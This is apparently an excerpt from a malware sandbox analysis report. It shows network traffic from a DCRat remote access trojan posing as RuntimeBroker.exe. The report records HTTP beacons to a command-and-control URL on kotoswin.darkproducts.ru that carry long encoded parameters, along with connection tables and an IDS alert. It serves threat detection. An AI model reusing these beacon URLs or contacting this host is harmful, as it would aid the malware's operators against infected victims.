Szl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZnUuJmdKNjYVlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSTl1aG1mYo5URJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSzEFROJDN510MwMETzkERPBDNT5EMJl2Tp1kMiNnSDxUaFBTUp9maJVjSIRWdWNjYqp0QMlWTXpVaWdFZSpUaPlGNyIGckdlW5p0QMl2dXlFbKhEZ1lzVUl2bqlUNShVYqp0QMlWVE5Ee0MUTxUkaMVTVU1UdrpmTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWZ1QWO4cjM0gjY2UTYlRTOjJWNiRDZlFGOyYGNmVjNiwiImR2Y2QjNiF2NwMmZlhTY0ADOxEDZmVTN1cTN2EWYycTYwYTYhJGMlJiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W | unknown | — | — | malicious |
7012 | RuntimeBroker.exe | GET | 200 | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&02630fec14d4acf093b4aa6b04be05a1=d1nIlNWZkBzN0QmZ0QDOmlTYkJWY2cjYhRTYjRjNhZTYyYDN5YzMiVGO0IiOiUjNzcTOhNmY2cTNwQDNmVWNxIGZjVWO5MzM1AzN4YmMiwiI4kjZhZDN5kDN0MGMyIGMzQ2N4UGMwMTY0UGO3gDM3kjNxQmZ0QGNzIiOiQGNygTO4cTMlBjY5UjM4UzYwMDN0YWZjVDMyIGM1IGNis3W&543e251a8931e4d89f708366c523c31c=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 | unknown | — | — | malicious |
7012 | RuntimeBroker.exe | GET | 200 | 172.67.194.232:80 | http://kotoswin.darkproducts.ru/L1nc0In.php?b89Tec8tEKm3H=hIzF5oMNqkmhUYKd3&iKDv=nKw2Pi9TRo&0a4b3e0abde6088f3a4eb375c6a13c54=wM0U2M5ADOzY2Y0EmYkhDOkNjMkVTZwETN1ATN4QjNxIWY1YGMhN2Y1QjNwIjM1ETNyADOxkjM&646acf5d6c8b1a7fc193c9ecad426d3d=gN3MDOkVWNiBjM2IDMhJTN2MWOwgDNjRzNzAjM2IDOzMzYhRGZxQWM&8e9e2ba1c0140a5dcf9b62f8d6f73d2c=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 | unknown | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
2160 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2160 | svchost.exe | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2160 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
kotoswin.darkproducts.ru |
| malicious |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |